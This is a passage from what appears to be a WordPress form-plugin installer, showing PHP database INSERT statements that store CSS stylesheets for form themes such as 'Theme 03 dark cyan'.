#fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #942323 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #811919;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #9E1919;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #811818;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/02/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #640B0B;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #942323;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #9A0B0B  0%, #7B2828 39%, #752D2D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #9A0B0B ), color-stop(39%, #7B2828 ), color-stop(100%, #752D2D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/02/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 03 dark cyan\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #0B7A97;\r\nmargin-bottom: 10px;\r\ncolor: #0B7A97;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #2796B3 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/03/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #0B7A97;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #18627C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #56B4D5;\r\nfont-family: Segoe UI;\r\n}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/03/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	